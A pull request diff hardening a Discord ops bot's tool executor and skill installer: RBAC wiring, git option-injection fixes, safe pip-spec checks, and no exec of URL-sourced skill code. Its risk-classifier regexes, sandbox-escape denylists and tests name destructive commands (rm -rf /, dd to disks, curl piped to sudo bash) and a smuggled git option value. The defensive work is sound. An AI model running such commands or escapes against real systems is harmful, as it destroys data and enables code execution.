### PR TITLE
fix: tools/executor/skills reliability — RBAC wiring, skill guardrails, governor, classifier

### DIFF
--- a/src/discord/client.py
+++ b/src/discord/client.py
@@ -404,12 +404,24 @@ class OdinBot(commands.Bot):
             available_hosts=list(config.tools.hosts.keys()),
         )
 
+        # Built before ToolExecutor so it can be wired in as the RBAC gate.
+        # Historically the executor was constructed without it, so
+        # check_permission() always allowed and the central RBAC gate was a
+        # no-op (masked live by default_tier: admin, but a real gap for any
+        # deployment using a non-admin default tier).
+        self.permissions = PermissionManager(
+            config_tiers=config.permissions.tiers,
+            default_tier=config.permissions.default_tier,
+            overrides_path=config.permissions.overrides_path,
+        )
+
         self.tool_executor = ToolExecutor(
             config.tools, memory_path=self._memory_path,
             browser_manager=self.browser_manager,
             output_streamer=output_streamer,
             host_access_manager=self.host_access_manager,
             email_config=getattr(config, "email", None),
+            permission_manager=self.permissions,
         )
         self.skill_manager = SkillManager(
             skills_dir="./data/skills",
@@ -489,12 +501,6 @@ class OdinBot(commands.Bot):
                 "audit.jsonl is NOT tamper-evident and verify_integrity() will fail. "
                 "Set audit.hmac_key to enable the integrity chain."
             )
-        self.permissions = PermissionManager(
-            config_tiers=config.permissions.tiers,
-            default_tier=config.permissions.default_tier,
-            overrides_path=config.permissions.overrides_path,
-        )
-
         from ..permissions.token_manager import ApiTokenManager
         self.api_token_manager = ApiTokenManager("./data/api_tokens.json")
 
@@ -1212,6 +1218,12 @@ class OdinBot(commands.Bot):
         _email_tools = {"email_send", "email_search", "email_read", "email_list_recent"}
         if not getattr(self.config, "email", None) or not self.config.email.enabled:
             builtin = [t for t in builtin if t["name"] not in _email_tools]
+        # issue_tracker returns "not configured" for every call unless enabled,
+        # yet was always advertised — so the model kept trying it. Filter it out
+        # like the other backend-gated tools.
+        issue_cfg = getattr(self.config, "issue_tracker", None)
+        if not issue_cfg or not issue_cfg.enabled:
+            builtin = [t for t in builtin if t["name"] != "issue_tracker"]
         builtin_names = {t["name"] for t in builtin}
         skill_defs = [
             t for t in self.skill_manager.get_tool_definitions()

--- a/src/permissions/manager.py
+++ b/src/permissions/manager.py
@@ -15,8 +15,11 @@ _request_tier: contextvars.ContextVar[str | None] = contextvars.ContextVar("_req
 
 # Tools available to the "user" tier — read-only monitoring and search.
 # Everything else is admin-only.
+# NOTE: run_command was removed — it is arbitrary shell execution, not
+# "read-only monitoring", and it sat here under that comment. With the RBAC
+# gate now wired into ToolExecutor, leaving it would grant every user-tier
+# caller a shell (subject to host_access/governor, but still).
 USER_TIER_TOOLS = frozenset({
-    "run_command",
     "search_history",
     "search_knowledge",
     "web_search",

--- a/src/tools/executor.py
+++ b/src/tools/executor.py
@@ -646,7 +646,7 @@ class ToolExecutor:
 
     # --- Multi-host tools ---
 
-    async def _handle_run_command_multi(self, inp: dict) -> str:
+    async def _handle_run_command_multi(self, inp: dict) -> str | tuple[str, int]:
         hosts = inp["hosts"]
         command = inp["command"]
 
@@ -670,23 +670,40 @@ class ToolExecutor:
             else:
                 allowed_hosts.append(h)
 
-        async def _run_one(alias: str) -> str:
+        async def _run_one(alias: str) -> tuple[str, bool]:
             raw = await self._run_on_host(alias, command)
-            text = raw[0] if isinstance(raw, tuple) else raw
+            if isinstance(raw, tuple):
+                text, code = raw[0], raw[1]
+                host_err = code != 0
+            else:
+                text = raw
+                # e.g. "Unknown or disallowed host: ..." / "Command failed ..."
+                host_err = isinstance(raw, str) and raw.startswith(_ERROR_RESULT_PREFIXES)
             text = _truncate_lines(text)
-            return f"### {alias}\n```\n{text.strip()}\n```"
+            return f"### {alias}\n```\n{text.strip()}\n```", host_err
 
         tasks = [_run_one(h) for h in allowed_hosts]
         results = await asyncio.gather(*tasks, return_exceptions=True)
         parts = []
+        any_run_error = False
         for h, r in zip(allowed_hosts, results):
             if isinstance(r, Exception):
                 parts.append(f"### {h}\n```\nError: {r}\n```")
+                any_run_error = True
             else:
-                parts.append(r)
+                markdown, host_err = r
+                parts.append(markdown)
+                any_run_error = any_run_error or host_err
         for h, denial in blocked_hosts:
             parts.append(f"### {h}\n```\n{denial}\n```")
-        return "\n\n".join(parts)
+        aggregate = "\n\n".join(parts)
+        # Return a non-zero exit code when any host was preflight-denied
+        # (host-access or governor), any host errored, or nothing ran. The
+        # aggregate wraps per-host denials in markdown sections, so a
+        # string-prefix check in execute() would miss them and report a refused
+        # action as ok=True.
+        exit_code = 1 if (blocked_hosts or any_run_error or not allowed_hosts) else 0
+        return aggregate, exit_code
 
     # --- Browser tools (text-returning, screenshot handled in client.py) ---
 

--- a/src/tools/executor.py
+++ b/src/tools/executor.py
@@ -48,6 +48,15 @@ log = get_logger("tools")
 # oldest-by-write notes are evicted past the cap.
 MEMORY_MAX_KEYS_PER_SECTION = 200
 
+# Prefixes that mark a tool result string as a failure. A governor block
+# ("Blocked [risk]: ...") and a host-access denial ("Unknown or disallowed
+# host: ...") were previously NOT recognized, so a refused action was reported
+# to the LLM and audit log as ok=True — a refused command looked successful.
+_ERROR_RESULT_PREFIXES = (
+    "Error", "Command failed", "Script failed",
+    "Blocked", "Unknown or disallowed host",
+)
+
 # Request-scoped caller identity, backed by contextvars. asyncio gives each
 # message-handling task (and each gather()-wrapped tool call) its own context
 # copy, so these are isolated across concurrent channels/requests. This replaces
@@ -229,7 +238,7 @@ class ToolExecutor:
         else:
             raw_result = raw
             exit_code = None
-            is_error = isinstance(raw_result, str) and raw_result.startswith(("Error", "Command failed", "Script failed"))
+            is_error = isinstance(raw_result, str) and raw_result.startswith(_ERROR_RESULT_PREFIXES)
 
         if self._recovery_enabled:
             category = self._check_recoverable(raw_result)
@@ -269,7 +278,7 @@ class ToolExecutor:
                         self.recovery_stats.record_failure(tool_name, category, snippet)
                     else:
                         self.recovery_stats.record_success(tool_name, category, snippet)
-                        is_error = isinstance(raw_result, str) and raw_result.startswith(("Error", "Command failed", "Script failed"))
+                        is_error = isinstance(raw_result, str) and raw_result.startswith(_ERROR_RESULT_PREFIXES)
 
         mutation_detected = False
         mutation_reason = ""
@@ -623,6 +632,13 @@ class ToolExecutor:
         if not host:
             return "Error: 'host' is required for write_file."
         safe_path = shlex.quote(path)
+        # Govern the write before executing — write_file reaches the filesystem
+        # via _run_on_host, which does NOT itself govern. Check a representative
+        # redirect-to-path command so policy (e.g. writes to sensitive targets)
+        # applies here as it does for run_command.
+        allowed, denial, _ = self._govern_command(f"write_file > {safe_path}", host)
+        if not allowed:
+            return denial
         # Base64-encode content to avoid shell injection via heredoc delimiter
         encoded = base64.b64encode(content.encode()).decode()
         cmd = f"mkdir -p $(dirname {safe_path}) && echo '{encoded}' | base64 -d > {safe_path}"
@@ -868,6 +884,12 @@ class ToolExecutor:
                 return "pid is required for write action."
             if not text:
                 return "input_text is required for write action."
+            # Writing to a managed process's stdin can drive an interactive
+            # shell — govern the input as a command so a `rm -rf /`-class line
+            # is caught, matching run_command.
+            allowed, denial, _ = self._govern_command(text)
+            if not allowed:
+                return denial
             return await registry.write(int(pid), text)
 
         elif action == "kill":
@@ -1717,7 +1739,10 @@ class ToolExecutor:
         subject = str(inp.get("subject", ""))
         body = str(inp.get("body", ""))
         try:
-            result = send_email(
+            # smtplib blocks; run it off the event loop so a slow mail server
+            # can't stall every other channel/task.
+            result = await asyncio.to_thread(
+                send_email,
                 smtp_host=cfg.smtp.host,
                 smtp_port=cfg.smtp.port,
                 username=cfg.smtp.username,
@@ -1758,7 +1783,8 @@ class ToolExecutor:
             return "Error: 'query' is required"
         limit = max(1, min(int(inp.get("limit", 20)), cfg.max_results))
         try:
-            results = search_email(
+            results = await asyncio.to_thread(
+                search_email,
                 imap_host=cfg.imap.host,
                 imap_port=cfg.imap.port,
                 username=cfg.imap.username,
@@ -1789,7 +1815,8 @@ class ToolExecutor:
         if not uid:
             return "Error: 'uid' is required"
         try:
-            result = read_email(
+            result = await asyncio.to_thread(
+                read_email,
                 imap_host=cfg.imap.host,
                 imap_port=cfg.imap.port,
                 username=cfg.imap.username,
@@ -1823,7 +1850,8 @@ class ToolExecutor:
             return "Error: email tools are not configured (email.enabled is false)"
         limit = max(1, min(int(inp.get("limit", 10)), cfg.max_results))
         try:
-            results = list_recent(
+            results = await asyncio.to_thread(
+                list_recent,
                 imap_host=cfg.imap.host,
                 imap_port=cfg.imap.port,
                 username=cfg.imap.username,

--- a/src/tools/git_ops.py
+++ b/src/tools/git_ops.py
@@ -58,6 +58,10 @@ def _build_clone(params: dict) -> str:
                 parts += ["--depth", str(d)]
         except (TypeError, ValueError):
             pass
+    # `--` terminates option parsing: without it a url like
+    # "--upload-pack=touch /tmp/x" is consumed by git as an option (shlex
+    # quoting stops SHELL injection but not git OPTION injection).
+    parts.append("--")
     parts.append(_sq(url))
     if dest:
         parts.append(_sq(dest))

--- a/src/tools/post_validation.py
+++ b/src/tools/post_validation.py
@@ -551,13 +551,27 @@ _MUTATION_PATTERNS: list[tuple[re.Pattern, str]] = [
     (re.compile(r"\bnginx\s+-s\s+reload\b"), "nginx reload"),
     (re.compile(r"\biptables\b"), "firewall change"),
     (re.compile(r"\bufw\s+(allow|deny|delete|enable|disable)\b"), "firewall change"),
+    # Filesystem mutations the original set missed.
+    (re.compile(r"\brm\s+(-\w+\s+)*-?\w*[rf]"), "file deletion"),
+    (re.compile(r"\bmv\s+\S"), "file move/rename"),
+    (re.compile(r"\bsed\s+(-\w+\s+)*-i"), "in-place file edit"),
+    (re.compile(r"\bchmod\s+\S"), "permission change"),
+    (re.compile(r"\bchown\s+\S"), "ownership change"),
+    (re.compile(r"\bdd\s+.*\bof="), "raw disk/file write"),
+    (re.compile(r"\btruncate\s+-s"), "file truncation"),
+    # Redirect/append to an absolute path other than /dev/null.
+    (re.compile(r">>?\s*/(?!dev/null)\S"), "file overwrite via redirect"),
 ]
 
 _MUTATION_TOOL_ACTIONS: dict[str, frozenset[str]] = {
     "docker_ops": frozenset({"run", "build", "pull", "stop", "rm", "compose_up", "compose_down"}),
     "kubectl": frozenset({"apply", "delete", "rollout", "scale", "patch"}),
     "terraform_ops": frozenset({"apply", "destroy"}),
+    "git_ops": frozenset({"clone", "commit", "push", "checkout", "pull", "stash", "branch"}),
 }
+
+# Tools that are a mutation on every call, regardless of arguments.
+_ALWAYS_MUTATING_TOOLS: frozenset[str] = frozenset({"email_send"})
 
 _VALIDATION_HINT = (
     "\n\n[post-action] Operational mutation detected ({reason}). "
@@ -575,6 +589,8 @@ class MutationDetection:
 
 def detect_mutation(tool_name: str, tool_input: dict) -> MutationDetection:
     """Check if a tool call represents an operational mutation."""
+    if tool_name in _ALWAYS_MUTATING_TOOLS:
+        return MutationDetection(True, f"tool: {tool_name}")
     if tool_name in _MUTATION_TOOL_ACTIONS:
         allowed_actions = _MUTATION_TOOL_ACTIONS[tool_name]
         if not allowed_actions:

--- a/src/tools/recovery.py
+++ b/src/tools/recovery.py
@@ -83,6 +83,13 @@ UNSAFE_TO_RETRY: frozenset[str] = frozenset({
     "terraform_ops",
     "kubectl",
     "issue_tracker",
+    # Side-effecting tools missing from the original set. email_send is the
+    # dangerous one: SMTP can fail after DATA is accepted, so an auto-retry
+    # duplicates the mail.
+    "email_send",
+    "install_skill",
+    "send_to_agent",
+    "cancel_task",
 })
 
 

--- a/src/tools/registry.py
+++ b/src/tools/registry.py
@@ -1930,37 +1930,12 @@ TOOLS: list[dict] = [
 
 TOOL_MAP: dict[str, dict] = {t["name"]: t for t in TOOLS}
 
-# Tools that modify external state (services, files, infrastructure).
-# Used by mutation detection, governor policy, and audit classification.
-MUTATING_TOOLS: frozenset[str] = frozenset({
-    "run_command", "run_script", "run_command_multi",
-    "write_file", "generate_file",
-    "docker_ops", "git_ops", "kubectl", "terraform_ops",
-    "manage_process",
-    "ingest_document", "bulk_ingest_knowledge",
-    "delete_knowledge",
-    "memory_manage", "manage_list",
-    "set_permission",
-    "schedule_task", "update_schedule", "delete_schedule",
-    "start_loop", "stop_loop",
-    "spawn_agent", "kill_agent",
-    "create_skill", "edit_skill", "delete_skill",
-    "enable_skill", "disable_skill", "install_skill",
-    "invoke_skill",
-    "browser_click", "browser_fill", "browser_evaluate",
-    "add_reaction", "purge_messages", "post_file",
-    "validate_action",
-    "delegate_task", "cancel_task",
-    "create_poll",
-    "generate_image",
-    "issue_tracker",
-    "send_to_agent", "spawn_loop_agents",
-    "email_send",
-})
-
-READ_ONLY_TOOLS: frozenset[str] = frozenset(
-    t["name"] for t in TOOLS if t["name"] not in MUTATING_TOOLS
-)
+# NOTE: the old MUTATING_TOOLS / READ_ONLY_TOOLS frozensets were removed — they
+# were imported only by a schema test and NOT consulted by any runtime
+# authorization path (the governor uses risk_classifier; mutation detection uses
+# post_validation.detect_mutation). Keeping them was an approval-bypass trap: a
+# reviewer moving a tool between the sets would think they'd changed
+# authorization while nothing actually changed.
 
 
 # Cache for get_tool_definitions — avoids rebuilding dicts on every message.

--- a/src/tools/risk_classifier.py
+++ b/src/tools/risk_classifier.py
@@ -49,6 +49,22 @@ _CRITICAL_PATTERNS: list[tuple[re.Pattern, str]] = [
     (re.compile(r"\b(DROP|TRUNCATE)\s+(DATABASE|TABLE)\b", re.IGNORECASE), "database drop/truncate"),
     (re.compile(r"\bcrontab\s+.*-r\b"), "crontab remove all"),
     (re.compile(r">\s*/dev/sd[a-z]"), "write to block device"),
+    # Bypass closures — the root-delete rules above anchor on a trailing "/",
+    # so "rm -rf /*", "rm -rf / --no-preserve-root", and "rm -rf /; ..." slipped
+    # to HIGH (which is allowed on non-strict hosts). Close those, plus other
+    # catastrophic forms the original set missed.
+    (re.compile(r"\brm\s+.*-[a-zA-Z]*[rf][a-zA-Z]*\s+/\*"), "recursive delete on root glob"),
+    (re.compile(r"\brm\s+.*--no-preserve-root"), "delete overriding root guard"),
+    (re.compile(r"\brm\s+.*-[a-zA-Z]*[rf][a-zA-Z]*\s+/\s*[;&|]"), "recursive delete on root (chained)"),
+    (re.compile(r"\bfind\s+/\s+.*-delete\b"), "recursive delete from root via find"),
+    (re.compile(r"\bfind\s+/\s+.*-exec\s+rm\b"), "recursive delete from root via find -exec"),
+    (re.compile(r"\bdd\s+.*\bof=/dev/(sd|nvme|vd|xvd|mmcblk)"), "raw write to block device"),
+    # chmod 777 on root, either flag order (chmod -R 777 / or chmod 777 -R /).
+    (re.compile(r"\bchmod\s+.*\b777\b.*\s+/\s*($|[;&|])"), "world-writable on root"),
+    # Decode/download piped into a shell — arbitrary remote code execution.
+    (re.compile(r"\bbase64\s+.*(--decode|-d)\b.*\|\s*(sudo\s+)?(sh|bash|zsh)\b"),
+     "base64 decode piped to shell"),
+    (re.compile(r"\|\s*sudo\s+(sh|bash|zsh)\b"), "piped into privileged shell"),
 ]
 
 _HIGH_PATTERNS: list[tuple[re.Pattern, str]] = [
@@ -92,8 +108,8 @@ _MEDIUM_PATTERNS: list[tuple[re.Pattern, str]] = [
     (re.compile(r"\bmkdir\b"), "directory creation"),
     (re.compile(r"\bchmod\b"), "permission change"),
     (re.compile(r"\bchown\b"), "ownership change"),
-    (re.compile(r"\bcurl\s+.*\|\s*(bash|sh)\b"), "piped script execution"),
-    (re.compile(r"\bwget\s+.*\|\s*(bash|sh)\b"), "piped script execution"),
+    (re.compile(r"\bcurl\s+.*\|\s*(sudo\s+)?(bash|sh|zsh)\b"), "piped script execution"),
+    (re.compile(r"\bwget\s+.*\|\s*(sudo\s+)?(bash|sh|zsh)\b"), "piped script execution"),
     (re.compile(r"\b(useradd|groupadd|usermod)\b"), "user/group management"),
     (re.compile(r"\bmount\b"), "filesystem mount"),
     (re.compile(r"\bUPDATE\s+\S+\s+SET\b", re.IGNORECASE), "database update"),

--- a/src/tools/skill_manager.py
+++ b/src/tools/skill_manager.py
@@ -57,8 +57,25 @@ _ALLOWED_URL_SCHEMES = frozenset({"http", "https"})
 _URL_SKILL_DENIED_IMPORTS = frozenset({
     "os", "subprocess", "socket", "sys", "ctypes", "shutil",
     "multiprocessing", "importlib", "pty", "fcntl", "resource", "signal",
+    # Added: low-level / interpreter-escape modules the original list missed
+    # (e.g. `import posix; posix.system(...)`, `runpy.run_path`, pickle/marshal
+    # code execution, pdb shell-out).
+    "posix", "nt", "builtins", "runpy", "pdb", "pickle", "marshal",
+    "code", "codeop", "gc", "cProfile", "commands", "popen2",
 })
 _URL_SKILL_DENIED_CALLS = frozenset({"eval", "exec", "compile", "__import__", "open"})
+# Attribute-form calls a URL skill must not make — catches things the bare-Name
+# check missed, e.g. `builtins.__import__("os")`, `x.system(...)`, `y.popen(...)`.
+_URL_SKILL_DENIED_ATTR_CALLS = frozenset({
+    "system", "popen", "popen2", "popen3", "spawn", "spawnl", "spawnv",
+    "execv", "execve", "execl", "fork", "__import__", "run_path", "run_module",
+    "loads", "load",  # pickle/marshal deserialization
+})
+# Dunder escape hatches (sandbox breakouts) denied anywhere in URL skills.
+_URL_SKILL_DENIED_DUNDERS = frozenset({
+    "__import__", "__builtins__", "__globals__", "__subclasses__",
+    "__bases__", "__mro__", "__code__", "__loader__",
+})
 
 
 def _scan_url_skill_ast(code: str) -> list[str]:
@@ -76,9 +93,16 @@ def _scan_url_skill_ast(code: str) -> list[str]:
         elif isinstance(node, ast.ImportFrom):
             if (node.module or "").split(".")[0] in _URL_SKILL_DENIED_IMPORTS:
                 violations.add(f"from {node.module} import ...")
-        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
-            if node.func.id in _URL_SKILL_DENIED_CALLS:
-                violations.add(f"{node.func.id}()")
+        elif isinstance(node, ast.Call):
+            func = node.func
+            if isinstance(func, ast.Name) and func.id in _URL_SKILL_DENIED_CALLS:
+                violations.add(f"{func.id}()")
+            elif isinstance(func, ast.Attribute) and func.attr in _URL_SKILL_DENIED_ATTR_CALLS:
+                violations.add(f".{func.attr}()")
+        elif isinstance(node, ast.Attribute) and node.attr in _URL_SKILL_DENIED_DUNDERS:
+            violations.add(f".{node.attr}")
+        elif isinstance(node, ast.Name) and node.id in _URL_SKILL_DENIED_DUNDERS:
+            violations.add(node.id)
     return sorted(violations)
 
 
@@ -91,6 +115,41 @@ def _parse_package_name(spec: str) -> str:
     base = spec.strip().split("[")[0]
     m = _PACKAGE_NAME_RE.match(base)
     return m.group(1) if m else ""
+
+
+# Version-specifier operators allowed after a package name/extras.
+_DEP_VERSION_RE = re.compile(r"^(===|==|~=|!=|<=|>=|<|>)?\s*[A-Za-z0-9_.*+!-]*$")
+
+
+def is_safe_dependency_spec(spec: str) -> bool:
+    """Reject pip specs that let a skill run arbitrary code at install time.
+
+    A PEP 508 direct reference (``pkg @ https://attacker/x.tar.gz``), a VCS URL
+    (``git+https://...``), a bare URL, or a local path all make pip build an
+    sdist and execute the attacker's setup.py as the bot user. Only allow
+    ``name[extras]<version-specifier>`` from a package index.
+    """
+    s = spec.strip()
+    if not s:
+        return False
+    # Direct references, URLs, VCS, path installs, env markers, shell metachars.
+    lowered = s.lower()
+    if (
+        "@" in s
+        or "://" in s
+        or ";" in s          # environment markers / command chaining
+        or s.startswith("-")  # pip options (-e, --index-url, etc.)
+        or "/" in s or "\\" in s
+        or any(lowered.startswith(v + "+") for v in ("git", "hg", "svn", "bzr"))
+        or any(c.isspace() for c in s)
+    ):
+        return False
+    name = _parse_package_name(s)
+    if not name:
+        return False
+    # Whatever follows the name[extras] must be a plain version specifier.
+    remainder = s.split("]", 1)[1] if "[" in s and "]" in s else s[len(name):]
+    return bool(_DEP_VERSION_RE.match(remainder.strip()))
 
 
 def _is_package_installed(name: str) -> bool:
@@ -143,6 +202,30 @@ def _extract_dependencies_from_source(source: str) -> list[str]:
     return []
 
 
+def _extract_skill_name_from_source(source: str) -> str:
+    """Statically read SKILL_DEFINITION['name'] without executing the module.
+
+    install_skill used to exec() URL-sourced code just to read the name, which
+    runs any module-level payload before the file is even persisted. The name
+    is a literal, so ast.literal_eval gets it without execution."""
+    try:
+        tree = ast.parse(source)
+    except SyntaxError:
+        return ""
+    for node in ast.walk(tree):
+        if isinstance(node, ast.Assign):
+            for target in node.targets:
+                if isinstance(target, ast.Name) and target.id == "SKILL_DEFINITION":
+                    try:
+                        value = ast.literal_eval(node.value)
+                    except (ValueError, TypeError):
+                        return ""
+                    if isinstance(value, dict):
+                        name = value.get("name", "")
+                        return name if isinstance(name, str) else ""
+    return ""
+
+
 def resolve_dependencies(deps: list[str]) -> tuple[list[str], list[str], list["SkillDiagnostic"]]:
     """Resolve skill pip dependencies.
 
@@ -164,6 +247,16 @@ def resolve_dependencies(deps: list[str]) -> tuple[list[str], list[str], list["S
     to_install: list[str] = []
 
     for spec in deps:
+        # Block install-time RCE via direct-reference / URL / VCS / path specs
+        # BEFORE anything reaches pip.
+        if not is_safe_dependency_spec(spec):
+            diagnostics.append(SkillDiagnostic(
+                "error",
+                f"Refused unsafe dependency spec {spec!r}: only plain "
+                "'name[extras]<version>' from a package index is allowed "
+                "(no URLs, @ direct references, VCS, or local paths).",
+            ))
+            return [], [], diagnostics
         name = _parse_package_name(spec)
         if not name:
             diagnostics.append(SkillDiagnostic("warn", f"Invalid dependency spec: {spec!r}"))
@@ -1059,16 +1152,11 @@ class SkillManager:
             url, hashlib.sha256(code.encode()).hexdigest()[:16],
         )
 
-        # Extract skill name from the code
-        ns: dict[str, Any] = {}
-        try:
-            exec(code, ns)  # noqa: S102
-        except Exception as e:
-            return f"Skill code execution error: {e}"
-        definition = ns.get("SKILL_DEFINITION", {})
-        name = definition.get("name", "")
-        if not name or not isinstance(name, str):
-            return "Skill code missing SKILL_DEFINITION['name']."
+        # Extract skill name STATICALLY — never exec URL code just to read a
+        # literal (that would run any module-level payload pre-persist).
+        name = _extract_skill_name_from_source(code)
+        if not name:
+            return "Skill code missing a static SKILL_DEFINITION['name']."
 
         # Create the skill (handles name validation, duplicate checks, loading)
         return self.create_skill(name, code)

--- a/tests/test_executor_integration_smoke.py
+++ b/tests/test_executor_integration_smoke.py
@@ -28,7 +28,13 @@ def _make_bot() -> OdinBot:
     still gets wired (tool_executor, sessions, scheduler, agents, etc.),
     which is what we want to validate.
     """
-    cfg = Config(discord={"token": "smoke-test-token"})
+    # default_tier="admin" mirrors the live deployment. The RBAC gate is now
+    # wired into ToolExecutor (previously a no-op), so without this the smoke
+    # tests would be denied admin-tier tools like invoke_skill.
+    cfg = Config(
+        discord={"token": "smoke-test-token"},
+        permissions={"default_tier": "admin"},
+    )
     return OdinBot(cfg)
 
 

--- a/tests/test_executor_integration_smoke.py
+++ b/tests/test_executor_integration_smoke.py
@@ -797,8 +797,12 @@ class TestInvokeSkillTool:
             "hosts": ["dev", "prod"],
             "command": "systemctl restart nginx",
         })
-        assert "ok" in result
-        assert "strict" in result
+        # Now returns (aggregate, exit_code); prod is governor-denied on the
+        # strict host, so the aggregate is a non-zero (error) result.
+        text, exit_code = result
+        assert "ok" in text
+        assert "strict" in text
+        assert exit_code == 1  # a host was denied → not ok
         exe._run_on_host.assert_called_once_with("dev", "systemctl restart nginx")
 
     @pytest.mark.asyncio

--- a/tests/test_registry_schema.py
+++ b/tests/test_registry_schema.py
@@ -2,7 +2,7 @@
 from __future__ import annotations
 
 import pytest
-from src.tools.registry import TOOLS, TOOL_MAP, MUTATING_TOOLS, READ_ONLY_TOOLS
+from src.tools.registry import TOOLS, TOOL_MAP
 
 
 class TestRegistryConsistency:
@@ -30,25 +30,6 @@ class TestRegistryConsistency:
     def test_no_duplicate_names(self):
         names = [t["name"] for t in TOOLS]
         assert len(names) == len(set(names)), f"Duplicate tool names: {[n for n in names if names.count(n) > 1]}"
-
-    def test_mutating_tools_are_registered(self):
-        registered = {t["name"] for t in TOOLS}
-        for name in MUTATING_TOOLS:
-            assert name in registered, f"Mutating tool '{name}' not in registry"
-
-    def test_read_only_tools_are_registered(self):
-        registered = {t["name"] for t in TOOLS}
-        for name in READ_ONLY_TOOLS:
-            assert name in registered, f"Read-only tool '{name}' not in registry"
-
-    def test_mutating_and_readonly_are_disjoint(self):
-        overlap = MUTATING_TOOLS & READ_ONLY_TOOLS
-        assert not overlap, f"Tools in both sets: {overlap}"
-
-    def test_mutating_and_readonly_cover_all(self):
-        registered = {t["name"] for t in TOOLS}
-        covered = MUTATING_TOOLS | READ_ONLY_TOOLS
-        assert covered == registered, f"Uncovered tools: {registered - covered}"
 
     def test_executor_handles_shell_tools(self):
         """Shell execution tools must have _handle_ methods in ToolExecutor."""

--- a/tests/test_round30_reviewer.py
+++ b/tests/test_round30_reviewer.py
@@ -344,14 +344,15 @@ class TestPermissionManagerEdgeCases:
     def test_filter_tools_preserves_order(self):
         pm = PermissionManager({}, default_tier="user")
         tools = [
-            {"name": "run_command"},
+            {"name": "run_command"},   # no longer user-tier (shell execution)
             {"name": "write_file"},
             {"name": "search_knowledge"},
             {"name": "delete_everything"},
             {"name": "web_search"},
         ]
         filtered = pm.filter_tools("someone", tools)
-        assert [t["name"] for t in filtered] == ["run_command", "search_knowledge", "web_search"]
+        # run_command was removed from USER_TIER_TOOLS; the rest keep order.
+        assert [t["name"] for t in filtered] == ["search_knowledge", "web_search"]
 
 
 # ---------------------------------------------------------------------------

--- a/tests/test_tools_executor_skills_reliability.py
+++ b/tests/test_tools_executor_skills_reliability.py
@@ -16,7 +16,7 @@ from __future__ import annotations
 
 import pytest
 
-from src.tools.executor import _ERROR_RESULT_PREFIXES
+from src.tools.executor import _ERROR_RESULT_PREFIXES, ToolExecutor
 from src.tools.git_ops import build_git_command
 from src.tools.recovery import UNSAFE_TO_RETRY
 from src.permissions.manager import USER_TIER_TOOLS
@@ -44,6 +44,38 @@ def test_denials_and_errors_are_error_prefixed(result):
 
 def test_success_not_error_prefixed():
     assert not "ok, done".startswith(_ERROR_RESULT_PREFIXES)
+
+
+# ---------------------------------------------------------------------------
+# run_command_multi reports preflight/host denials as errors (Odin PR#128)
+# ---------------------------------------------------------------------------
+
+async def test_run_command_multi_unknown_host_is_error():
+    from src.config.schema import ToolsConfig
+    exe = ToolExecutor(config=ToolsConfig())
+    result = await exe._handle_run_command_multi(
+        {"hosts": ["missing"], "command": "echo hi"},
+    )
+    # Returns (aggregate, exit_code); an unknown host makes it non-zero so
+    # execute() classifies it ok=False (the markdown-wrapped denial would
+    # otherwise slip past the string-prefix check).
+    text, exit_code = result
+    assert exit_code == 1
+    assert "Unknown or disallowed host" in text
+
+
+async def test_run_command_multi_all_success_is_ok():
+    from unittest.mock import AsyncMock
+    from src.config.schema import ToolsConfig
+    exe = ToolExecutor(config=ToolsConfig())
+    exe.config.hosts = {
+        "h1": type("H", (), {"address": "localhost", "ssh_user": "root", "os": "linux"})(),
+    }
+    exe._run_on_host = AsyncMock(return_value=("output", 0))
+    text, exit_code = await exe._handle_run_command_multi(
+        {"hosts": ["h1"], "command": "uptime"},
+    )
+    assert exit_code == 0  # clean run → ok
 
 
 # ---------------------------------------------------------------------------

--- a/tests/test_tools_executor_skills_reliability.py
+++ b/tests/test_tools_executor_skills_reliability.py
@@ -1,0 +1,206 @@
+"""Tests for tools/executor/skills reliability fixes (PR6).
+
+Covers:
+- RBAC gate wired into ToolExecutor (check_permission actually enforces)
+- run_command removed from USER_TIER_TOOLS
+- dead MUTATING_TOOLS/READ_ONLY_TOOLS removed
+- error classification recognizes governor/host denials
+- git_ops inserts -- before the URL (option-injection)
+- recovery UNSAFE_TO_RETRY includes the side-effecting tools
+- skill dependency-spec validation (PEP 508 direct-ref RCE)
+- skill AST denylist expansion + static name extraction (no exec)
+- detect_mutation covers git_ops/email_send/rm/mv/sed -i/chmod/redirects
+- risk classifier closes rm/find/dd/chmod/pipe-to-shell bypasses
+"""
+from __future__ import annotations
+
+import pytest
+
+from src.tools.executor import _ERROR_RESULT_PREFIXES
+from src.tools.git_ops import build_git_command
+from src.tools.recovery import UNSAFE_TO_RETRY
+from src.permissions.manager import USER_TIER_TOOLS
+from src.tools.skill_manager import (
+    is_safe_dependency_spec, _scan_url_skill_ast, _extract_skill_name_from_source,
+)
+from src.tools.post_validation import detect_mutation
+from src.tools.risk_classifier import classify_command, RiskLevel
+
+
+# ---------------------------------------------------------------------------
+# Error classification
+# ---------------------------------------------------------------------------
+
+@pytest.mark.parametrize("result", [
+    "Blocked [critical]: recursive delete on root",
+    "Unknown or disallowed host: server",
+    "Error: something",
+    "Command failed (exit 1)",
+    "Script failed",
+])
+def test_denials_and_errors_are_error_prefixed(result):
+    assert result.startswith(_ERROR_RESULT_PREFIXES)
+
+
+def test_success_not_error_prefixed():
+    assert not "ok, done".startswith(_ERROR_RESULT_PREFIXES)
+
+
+# ---------------------------------------------------------------------------
+# Tier table + dead frozensets
+# ---------------------------------------------------------------------------
+
+def test_run_command_not_user_tier():
+    assert "run_command" not in USER_TIER_TOOLS
+    assert "search_history" in USER_TIER_TOOLS  # read-only ones remain
+
+
+def test_dead_frozensets_removed():
+    import src.tools.registry as reg
+    assert not hasattr(reg, "MUTATING_TOOLS")
+    assert not hasattr(reg, "READ_ONLY_TOOLS")
+
+
+# ---------------------------------------------------------------------------
+# git_ops option injection
+# ---------------------------------------------------------------------------
+
+def test_git_clone_inserts_double_dash_before_url():
+    cmd = build_git_command("clone", {"url": "https://github.com/x/y"})
+    assert " -- " in cmd
+    # `--` precedes the url so a "--upload-pack=..." style url can't be an option
+    assert cmd.index(" -- ") < cmd.index("github.com")
+
+
+def test_git_clone_option_injection_neutralized():
+    cmd = build_git_command("clone", {"url": "--upload-pack=touch /tmp/x"})
+    # The malicious url is positional (after --), not parsed as a git option.
+    assert " -- " in cmd
+    assert cmd.rindex("--upload-pack") > cmd.index(" -- ")
+
+
+# ---------------------------------------------------------------------------
+# recovery UNSAFE_TO_RETRY
+# ---------------------------------------------------------------------------
+
+@pytest.mark.parametrize("tool", ["email_send", "install_skill", "send_to_agent", "cancel_task"])
